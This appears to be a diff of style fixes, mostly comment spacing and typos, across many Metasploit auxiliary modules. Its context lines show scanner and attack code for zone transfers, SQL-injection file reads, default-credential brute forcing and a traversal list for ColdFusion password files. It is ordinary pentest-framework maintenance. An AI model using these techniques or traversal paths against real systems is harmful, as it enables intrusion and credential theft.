@ -387,7 +382,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'dns.enum',
|
||||
:update => :unique_data,
|
||||
:data => "Zone transfer successful")
|
||||
#Prints each record according to its type
|
||||
# Prints each record according to its type
|
||||
zone.each do |response|
|
||||
response.answer.each do |rr|
|
||||
begin
|
||||
@ -475,7 +470,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:data => "#{rr.host},#{rr.port},#{rr.priority},SRV")
|
||||
end
|
||||
rescue ActiveRecord::RecordInvalid
|
||||
#Do nothing. Probably tried to store :host => 127.0.0.1
|
||||
# Do nothing. Probably tried to store :host => 127.0.0.1
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Michele Spagnuolo', # discovery, wrote rosetta encoder, disclosure
|
||||
'joev' # msf module
|
||||
'joev' # metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -84,10 +84,10 @@ class Metasploit4 < Msf::Auxiliary
|
||||
fail_with("Error in server response")
|
||||
end
|
||||
|
||||
#qgjuq is prepended to the result of the sql injection
|
||||
#qirpq is appended to the result of the sql injection
|
||||
#This allows the use of a simple regex to grab the contents
|
||||
#of the file easily from the page source.
|
||||
# qgjuq is prepended to the result of the sql injection
|
||||
# qirpq is appended to the result of the sql injection
|
||||
# This allows the use of a simple regex to grab the contents
|
||||
# of the file easily from the page source.
|
||||
file = /qgjuq(.*)qirpq/.match(resp.body)
|
||||
|
||||
file = file[0].gsub('qgjuq', '').gsub('qirpq', '')
|
||||
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
#Check PhP
|
||||
# Check PhP
|
||||
php_version = res['X-Powered-By']
|
||||
if php_version
|
||||
php_version = "#{php_version}"
|
||||
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
php_version = "PHP version unknown"
|
||||
end
|
||||
|
||||
#Check Web-Server
|
||||
# Check Web-Server
|
||||
web_server = res['Server']
|
||||
if web_server
|
||||
web_server = "#{web_server}"
|
||||
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
web_server = "unknown web server"
|
||||
end
|
||||
|
||||
#Check forum MyBB
|
||||
# Check forum MyBB
|
||||
if res.body.match("MYBB")
|
||||
print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}")
|
||||
return Exploit::CheckCode::Detected
|
||||
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#Resolve response
|
||||
# Resolve response
|
||||
if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/)
|
||||
print_good("#{peer} - Running PostgreSQL Database")
|
||||
elsif response.body.match(/General error\: 1 no such function\: REGEXP/)
|
||||
|
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
end
|
||||
|
||||
#Search google.com for email's of target domain
|
||||
# Search google.com for email's of target domain
|
||||
def search_google(targetdom)
|
||||
print_status("Searching Google for email addresses from #{targetdom}")
|
||||
response = ""
|
||||
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return emails.uniq
|
||||
end
|
||||
|
||||
#Search Yahoo.com for email's of target domain
|
||||
# Search Yahoo.com for email's of target domain
|
||||
def search_yahoo(targetdom)
|
||||
print_status("Searching Yahoo for email addresses from #{targetdom}")
|
||||
response = ""
|
||||
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return emails.uniq
|
||||
end
|
||||
|
||||
#Search Bing.com for email's of target domain
|
||||
# Search Bing.com for email's of target domain
|
||||
def search_bing(targetdom)
|
||||
print_status("Searching Bing email addresses from #{targetdom}")
|
||||
response = ""
|
||||
@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return emails.uniq
|
||||
end
|
||||
|
||||
#for writing file with all email's found
|
||||
# for writing file with all email's found
|
||||
def write_output(data)
|
||||
print_status("Writing email address list to #{datastore['OUTFILE']}...")
|
||||
::File.open(datastore['OUTFILE'], "ab") do |fd|
|
||||
|
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#Trigger firmware bootstrap write out password data to URL root
|
||||
# Trigger firmware bootstrap write out password data to URL root
|
||||
def write
|
||||
print_status("#{rhost}:#{jport} - Sending print job")
|
||||
create_print_job = '%%XRXbegin' + "\x0a"
|
||||
|
@ -23,8 +23,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],
|
||||
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]
|
||||
[ 'URL', 'https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],
|
||||
[ 'URL', 'https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]
|
||||
|
||||
],
|
||||
'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],
|
||||
|
@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]
|
||||
[ 'URL', 'https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]
|
||||
],
|
||||
'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE
|
||||
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sock.put(trojan_command(:nop))
|
||||
|
||||
print_status("#{ip}:#{rport} FOUND: #{files.inspect}")
|
||||
## Add Vulnerability and Report
|
||||
# Add Vulnerability and Report
|
||||
report_vuln({
|
||||
:host => ip,
|
||||
:name => "Energizer DUO USB Battery Charger Software Arucer.dll Trojaned Distribution",
|
||||
|
@ -31,9 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
begin
|
||||
|
||||
connect_udp
|
||||
|
||||
udp_sock.put(pkt)
|
||||
|
||||
res = udp_sock.read(1024).split(/\x00/)
|
||||
|
||||
if (res)
|
||||
|
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#reportdata << "name: #{princ.unpack("H*")[0]}"
|
||||
end
|
||||
|
||||
## Add Report
|
||||
# Add Report
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'tcp',
|
||||
|
@ -149,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
# Start caputure
|
||||
# Start capture
|
||||
open_pcap({'FILTER' => "icmp6"})
|
||||
|
||||
@netifaces = true
|
||||
|
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'xistence' #Vulnerability discovery and Metasploit module
|
||||
'xistence' # Vulnerability discovery and Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => "Jan 28 2014"
|
||||
|
@ -198,7 +198,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
end
|
||||
|
||||
#URL's that may work for you:
|
||||
# URLs that may work for you:
|
||||
#"/CFIDE/administrator/enter.cfm",
|
||||
#"/CFIDE/wizards/common/_logintowizard.cfm",
|
||||
#"/CFIDE/administrator/archives/index.cfm",
|
||||
@ -206,7 +206,7 @@ end
|
||||
#"/CFIDE/administrator/entman/index.cfm",
|
||||
#"/CFIDE/administrator/logging/settings.cfm",
|
||||
|
||||
#Files to grab
|
||||
# Files to grab
|
||||
#../../../../../../../../../../ColdFusion8/lib/password.properties%00en
|
||||
#../../../../../../../../../../CFusionMX7/lib/password.properties%00en
|
||||
#../../../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en
|
||||
|
@ -105,7 +105,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||
# print table
|
||||
print_line(membertbl.to_s)
|
||||
|
||||
#store username to loot
|
||||
# store username to loot
|
||||
report_note({
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
|
@ -25,8 +25,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'hdm', #http_login module
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
|
||||
'hdm', # http_login module
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}
|
||||
end
|
||||
|
||||
#default to user=admin without password (default on most dlink routers)
|
||||
# default to user=admin without password (default on most dlink routers)
|
||||
def do_login(user='admin', pass='')
|
||||
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
|
||||
|
||||
|
@ -23,8 +23,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
devices. It is possible that this module also works with other models.
|
||||
},
|
||||
'Author' => [
|
||||
'hdm', #http_login module
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
|
||||
'hdm', #http_login module
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def is_dlink?
|
||||
#the tested DIR-615 has no nice Server banner, gconfig.htm gives us interesting
|
||||
#input to detect this device. Not sure if this works on other devices! Tested on v8.04.
|
||||
# the tested DIR-615 has no nice Server banner, gconfig.htm gives us interesting
|
||||
# input to detect this device. Not sure if this works on other devices! Tested on v8.04.
|
||||
begin
|
||||
response = send_request_cgi({
|
||||
'uri' => '/gconfig.htm',
|
||||
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return false if response.nil?
|
||||
return false if (response.code == 404)
|
||||
|
||||
#fingerprinting tested on firmware version 8.04
|
||||
# fingerprinting tested on firmware version 8.04
|
||||
if response.body !~ /var\ systemName\=\'DLINK\-DIR615/
|
||||
return false
|
||||
else
|
||||
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#default to user=admin without password (default on most dlink routers)
|
||||
# default to user=admin without password (default on most dlink routers)
|
||||
def do_login(user='admin', pass='')
|
||||
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
|
||||
|
||||
|
@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}
|
||||
end
|
||||
|
||||
#default to user=admin without password (default on most dlink routers)
|
||||
# default to user=admin without password (default on most dlink routers)
|
||||
def do_login(user='admin', pass='')
|
||||
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
|
||||
|
||||
|
@ -37,12 +37,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
])
|
||||
], self.class)
|
||||
|
||||
# "Set to false to prevent account lockouts - it will!"
|
||||
# Set to false to prevent account lockouts - it will!
|
||||
deregister_options('BLANK_PASSWORDS')
|
||||
end
|
||||
|
||||
def target_url
|
||||
#Function to display correct protocol and host/vhost info
|
||||
# Function to display correct protocol and host/vhost info
|
||||
if rport == 443 or ssl
|
||||
proto = "https"
|
||||
else
|
||||
@ -74,8 +74,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#Check for HTTP 200 response.
|
||||
#Numerous versions and configs make if difficult to further fingerprint.
|
||||
# Check for HTTP 200 response.
|
||||
# Numerous versions and configs make if difficult to further fingerprint.
|
||||
if (res and res.code == 200)
|
||||
print_status("Ektron CMS400.NET install found at #{target_url} [HTTP 200]")
|
||||
|
||||
@ -110,8 +110,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def get_version
|
||||
#Attempt to retrieve the version of CMS400.NET installed.
|
||||
#Not always possible based on version/config.
|
||||
# Attempt to retrieve the version of CMS400.NET installed.
|
||||
# Not always possible based on version/config.
|
||||
payload = "http://#{vhost}:#{rport}/WorkArea/java/ektron.site-data.js.ashx"
|
||||
res = send_request_cgi(
|
||||
{
|
||||
|
@ -158,7 +158,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
|
||||
if dm == false
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
|
||||
#blah
|
||||
end
|
||||
else
|
||||
if res.code.to_i == 400 and ecode != 400
|
||||
|
@ -128,17 +128,17 @@ class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
case action.name
|
||||
when 'PUT'
|
||||
#Append filename if there isn't one
|
||||
# Append filename if there isn't one
|
||||
if path !~ /(.+\.\w+)$/
|
||||
path << "#{Rex::Text.rand_text_alpha(5)}.txt"
|
||||
vprint_status("No filename specified. Using: #{path}")
|
||||
end
|
||||
|
||||
#Upload file
|
||||
# Upload file
|
||||
res = do_put(path, data)
|
||||
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
|
||||
|
||||
#Check file
|
||||
# Check file
|
||||
if not res.nil? and file_exists(path, data)
|
||||
turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
|
||||
print_good("File uploaded: #{turl}")
|
||||
@ -156,7 +156,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
when 'DELETE'
|
||||
#Check file before deleting
|
||||
# Check file before deleting
|
||||
if path !~ /(.+\.\w+)$/
|
||||
print_error("You must supply a filename")
|
||||
return
|
||||
@ -165,11 +165,11 @@ class Metasploit4 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#Delete our file
|
||||
# Delete our file
|
||||
res = do_delete(path)
|
||||
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
|
||||
|
||||
#Check if DELETE was successful
|
||||
# Check if DELETE was successful
|
||||
if res.nil? or file_exists(path, data)
|
||||
print_error("DELETE failed. File is still there.")
|
||||
else
|
||||
|
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}
|
||||
})
|
||||
|
||||
#without res.body.length we get lots of false positives
|
||||
# without res.body.length we get lots of false positives
|
||||
if (res and res.code == 200 and res.body.length > 0)
|
||||
print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
|
||||
report_web_vuln({
|
||||
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
|
||||
|
||||
#test login
|
||||
# test login
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => '/',
|
||||
|
@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' =>
|
||||
[
|
||||
'Pedro Ribeiro <pedrib[at]gmail.com>', # Discovery and exploit
|
||||
'Brendan Coles <bcoles[at]gmail.com>' # msf
|
||||
'Brendan Coles <bcoles[at]gmail.com>' # metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'blkhtc0rp', #Original
|
||||
'sinn3r'
|
||||
'blkhtc0rp', #Original
|
||||
'sinn3r' #Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => "Oct 19 2012"
|
||||
|
@ -34,9 +34,9 @@ class Metasploit4 < Msf::Auxiliary
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Daniel Franke', # Vulnerability discovery and PoC
|
||||
'juan vazquez', # Metasploit module
|
||||
'Christian Mehlmauer' # Metasploit module
|
||||
'Daniel Franke', # Vulnerability discovery and PoC
|
||||
'juan vazquez', # Metasploit module
|
||||
'Christian Mehlmauer' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
tpath += '/'
|
||||
end
|
||||
|
||||
#load the file with filenames into memory
|
||||
# load the file with filenames into memory
|
||||
queue = []
|
||||
File.open(datastore['FILEPATH'], 'rb').each_line do |fn|
|
||||
queue << fn.strip
|
||||
|
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return save_array
|
||||
end
|
||||
|
||||
#traversal every file
|
||||
# traverse every file
|
||||
def find_files(file,user,pass)
|
||||
traversal = '/../../'
|
||||
|
||||
@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
|
||||
|
||||
#test login
|
||||
# test login
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => '/',
|
||||
|
@ -186,8 +186,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return :abort
|
||||
end
|
||||
if action.name == "OWA_2013"
|
||||
#Check for a response code to make sure login was valid. Changes from 2010 to 2013.
|
||||
#Check if the password needs to be changed.
|
||||
# Check for a response code to make sure login was valid. Changes from 2010 to 2013.
|
||||
# Check if the password needs to be changed.
|
||||
if res.headers['location'] =~ /expiredpassword/
|
||||
print_good("#{msg} SUCCESSFUL LOGIN. '#{user}' : '#{pass}': NOTE password change required")
|
||||
report_hash = {
|
||||
@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return :next_user
|
||||
end
|
||||
|
||||
#No password change required moving on.
|
||||
# No password change required moving on.
|
||||
unless location = res.headers['location']
|
||||
print_error("#{msg} No HTTP redirect. This is not OWA 2013, aborting.")
|
||||
return :abort
|
||||
@ -212,7 +212,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if reason == nil
|
||||
headers['Cookie'] = 'PBack=0;' << res.get_cookies
|
||||
else
|
||||
#Login didn't work. no point on going on.
|
||||
# Login didn't work. no point on going on.
|
||||
vprint_error("#{msg} FAILED LOGIN. '#{user}' : '#{pass}' (HTTP redirect with reason #{reason})")
|
||||
return :Skip_pass
|
||||
end
|
||||
|
@ -18,8 +18,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
an arbitrary object instantiation flaw in the XML request processor.
|
||||
},
|
||||
'Author' => [
|
||||
'hdm', #author
|
||||
'jjarmoc' #improvements
|
||||
'hdm', # author
|
||||
'jjarmoc' # improvements
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -146,7 +146,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
|
||||
if dm == false
|
||||
print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}")
|
||||
#blah
|
||||
end
|
||||
else
|
||||
if res.code.to_i == 400 and ecode != 400
|
||||
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if res and res.code == 200
|
||||
case res.body
|
||||
when nil
|
||||
# Nothing
|
||||
# Nothing
|
||||
when /<Version xmlns=".*">(.*)<\/Version><\/getVersionResponse>/
|
||||
version = "#{$1}"
|
||||
success = true
|
||||
|
@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
super(
|
||||
'Name' => 'HTTP Page Scraper',
|
||||
'Description' => 'Scrap defined data from a specific web page based on a regular expresion',
|
||||
'Author' => ['et'],
|
||||
'Author' => ['et'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
@ -175,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return false
|
||||
else
|
||||
print_status("Server #{wmap_target_host}:#{datastore['RPORT']} responded to SOAPAction: #{v}#{n} with HTTP: #{res.code} #{res.message}.")
|
||||
## Add Report
|
||||
# Add Report
|
||||
report_note(
|
||||
host: ip,
|
||||
proto: 'tcp',
|
||||
|
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
vprint_status("[#{rhost}] Verifying manual testing is not required...")
|
||||
|
||||
manual = false
|
||||
#request a non-existent page first to make sure the server doesn't respond with a 200 to everything.
|
||||
# request a non-existent page first to make sure the server doesn't respond with a 200 to everything.
|
||||
res_test = send_request_cgi({
|
||||
'uri' => "http://#{datastore['CANARY_IP']}:80",
|
||||
'method' => 'GET',
|
||||
|
@ -87,17 +87,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if datastore['VERBOSE'] == true
|
||||
vprint_good("#{rhost}:#{rport} - Response - File #{file}:")
|
||||
res.body.each_line do |line|
|
||||
#the following is the last line of the useless response
|
||||
# the following is the last line of the useless response
|
||||
if line.to_s =~ /\/\/--><\/SCRIPT>/
|
||||
#setting out = true to print all of the following stuff
|
||||
# setting out = true to print all of the following stuff
|
||||
out = true
|
||||
next
|
||||
end
|
||||
if out == true
|
||||
if line =~ /<META/ or line =~ /<Script/
|
||||
#we are finished :)
|
||||
#the next line is typical code from the website and nothing from us
|
||||
#this means we can skip this stuff ...
|
||||
# we are finished :)
|
||||
# the next line is typical code from the website and nothing from us
|
||||
# this means we can skip this stuff ...
|
||||
out = false
|
||||
next
|
||||
else
|
||||
|
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'dun', #Discovery, PoC
|
||||
'sinn3r' #Metasploit
|
||||
'dun', # Discovery, PoC
|
||||
'sinn3r' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => "Jul 13 2012"
|
||||
|
@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'sinn3r', #Metasploit
|
||||
'sinn3r', # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -162,8 +162,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#
|
||||
# From the documentation:
|
||||
#
|
||||
# "In case of five consecutive failed login attempts, Zabbix interface will pause for 30
|
||||
# seconds in order to prevent brute force and dictionary attacks."
|
||||
# "In case of five consecutive failed login attempts, Zabbix interface will pause for 30
|
||||
# seconds in order to prevent brute force and dictionary attacks."
|
||||
#
|
||||
|
||||
# Zabbix enables a Guest mode by default that allows access to the dashboard without auth
|
||||
|
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if (res.nil?)
|
||||
print_error("no response for #{ip}:#{rport} #{check}")
|
||||
elsif (res.code == 200 and res.body)
|
||||
#string we are regexing: <!-- Domino Release 7.0.3FP1 (Windows NT/Intel) -->
|
||||
# string we are regexing: <!-- Domino Release 7.0.3FP1 (Windows NT/Intel) -->
|
||||
if match = res.body.match(/\<!-- Domino Release(.*) --\>/);
|
||||
server1 = $1
|
||||
report_note(
|
||||
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if (res.nil?)
|
||||
print_error("no response for #{ip}:#{rport} #{check}")
|
||||
elsif (res.code == 200 and res.body)
|
||||
#string we are regexing: <title>IBM Lotus Notes/Domino 6.5.6 Release Notes</title>
|
||||
# string we are regexing: <title>IBM Lotus Notes/Domino 6.5.6 Release Notes</title>
|
||||
if match = res.body.match(/\<title\>(.*)Lotus Notes\/Domino (.*) Release Notes\<\/title\>/);
|
||||
server2 = $2
|
||||
print_status("#{ip}:#{rport} Lotus Domino Release Notes Version: " + $2)
|
||||
@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if (res.nil?)
|
||||
print_error("no response for #{ip}:#{rport} #{check}")
|
||||
elsif (res.code == 200 and res.body and res.body.index('TotalFileSize') and res.body.index('FileCount'))
|
||||
#string we are regexing: # Regex Version=8.5.1.0
|
||||
# string we are regexing: # Regex Version=8.5.1.0
|
||||
if match = res.body.match(/Version=(.*)/);
|
||||
server3 = $1
|
||||
report_note(
|
||||
|
@ -98,10 +98,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
data = http.get(20)
|
||||
|
||||
if data =~ /DVR WebViewer/i
|
||||
#Confirmed ActiveX control over HTTP, display the control name and version
|
||||
#Report HTTP service info since there is a confirmed IE ActiveX control
|
||||
#Code base example:
|
||||
#codebase="CtrWeb.cab#version=1,1,5,4"
|
||||
# Confirmed ActiveX control over HTTP, display the control name and version
|
||||
# Report HTTP service info since there is a confirmed IE ActiveX control
|
||||
# Code base example:
|
||||
# codebase="CtrWeb.cab#version=1,1,5,4"
|
||||
if data.match(/codebase="(\w{1,16})\.(\w{1,3}).version=(\d{1,3},\d{1,3},\d{1,3},\d{1,3})/)
|
||||
v = "#{$1}.#{$2} v#{$3}"
|
||||
else
|
||||
@ -118,8 +118,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:info => "IE ActiveX CCTV DVR Control (#{v})"
|
||||
)
|
||||
else
|
||||
#An HTTP server is listening on HTTP_PORT, however, does not appear to be
|
||||
#the ActiveX control
|
||||
# An HTTP server is listening on HTTP_PORT, however, does not appear to be
|
||||
# the ActiveX control
|
||||
print_status("An unknown HTTP interface was found on #{datastore['HTTP_PORT']}/TCP")
|
||||
end
|
||||
|
||||
@ -135,15 +135,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
fill_length1 = 64 - user.length
|
||||
|
||||
#Check if user name length is too long for submission (exceeds packet length)
|
||||
# Check if user name length is too long for submission (exceeds packet length)
|
||||
if fill_length1 < 1
|
||||
return
|
||||
end
|
||||
|
||||
#Build the authentication packet starting here
|
||||
# Build the authentication packet starting here
|
||||
data = "\x00\x01\x00\x00\x80\x00\x00\x00" + user + ("\x00" * fill_length1)
|
||||
|
||||
#Check if password length is too long for submission (exceeds packet length)
|
||||
# Check if password length is too long for submission (exceeds packet length)
|
||||
fill_length2 = 64 - pass.length
|
||||
if fill_length2 < 1
|
||||
return
|
||||
@ -164,14 +164,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return :abort
|
||||
end
|
||||
|
||||
#Analyze the response
|
||||
# Analyze the response
|
||||
if res == "\x00\x01\x03\x01\x00\x00\x00\x00" #Failed Password
|
||||
vprint_error("#{rhost}:#{rport} Failed login as: '#{user}'")
|
||||
return
|
||||
|
||||
elsif res =="\x00\x01\x02\x01\x00\x00\x00\x00" #Invalid User
|
||||
vprint_error("#{rhost}:#{rport} Invalid user: '#{user}'")
|
||||
#Stop attempting passwords for this user since it doesn't exist
|
||||
# Stop attempting passwords for this user since it doesn't exist
|
||||
return :skip_user
|
||||
|
||||
elsif res =="\x00\x01\x05\x01\x00\x00\x00\x00" or res =="\x00\x01\x01\x01\x00\x00\x00\x00"
|
||||
|
@ -210,9 +210,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print("Version of the InterBase server: #{info_svc_server_version}\n")
|
||||
print("Implementation of the InterBase server: #{info_svc_implementation}\n\n")
|
||||
|
||||
# print(Rex::Text.to_hex_dump(response))
|
||||
#print(Rex::Text.to_hex_dump(response))
|
||||
|
||||
#Add Report
|
||||
# Add Report
|
||||
report_note(
|
||||
:host => ip,
|
||||
:sname => 'ib',
|
||||
@ -222,7 +222,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:data => "Version of the InterBase server: #{info_svc_server_version}"
|
||||
)
|
||||
|
||||
#Add Report
|
||||
# Add Report
|
||||
report_note(
|
||||
:host => ip,
|
||||
:sname => 'ib',
|
||||
|
@ -49,8 +49,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
last_six = mac.value.unpack("H2H2H2H2H2H2").join[-6,6].upcase
|
||||
first_six = mac.value.unpack("H2H2H2H2H2H2").join[0,6].upcase
|
||||
|
||||
#check if it is a OKI
|
||||
#OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt
|
||||
# check if it is a OKI
|
||||
# OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt
|
||||
if first_six == "002536" || first_six == "008087" || first_six == "002536"
|
||||
sys_name = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
|
||||
print_status("Found: #{sys_name}")
|
||||
|
@ -65,15 +65,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def require_auth?
|
||||
request_id = Rex::Text.rand_text(4)
|
||||
packet = "\x3f\x00\x00\x00" #messageLength (63)
|
||||
packet << request_id #requestID
|
||||
packet << "\xff\xff\xff\xff" #responseTo
|
||||
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
|
||||
packet << "\x00\x00\x00\x00" #flags
|
||||
packet << "\x61\x64\x6d\x69\x6e\x2e\x24\x63\x6d\x64\x00" #fullCollectionName (admin.$cmd)
|
||||
packet << "\x00\x00\x00\x00" #numberToSkip (0)
|
||||
packet << "\x01\x00\x00\x00" #numberToReturn (1)
|
||||
#query ({"listDatabases"=>1})
|
||||
packet = "\x3f\x00\x00\x00" # messageLength (63)
|
||||
packet << request_id # requestID
|
||||
packet << "\xff\xff\xff\xff" # responseTo
|
||||
packet << "\xd4\x07\x00\x00" # opCode (2004 OP_QUERY)
|
||||
packet << "\x00\x00\x00\x00" # flags
|
||||
packet << "\x61\x64\x6d\x69\x6e\x2e\x24\x63\x6d\x64\x00" # fullCollectionName (admin.$cmd)
|
||||
packet << "\x00\x00\x00\x00" # numberToSkip (0)
|
||||
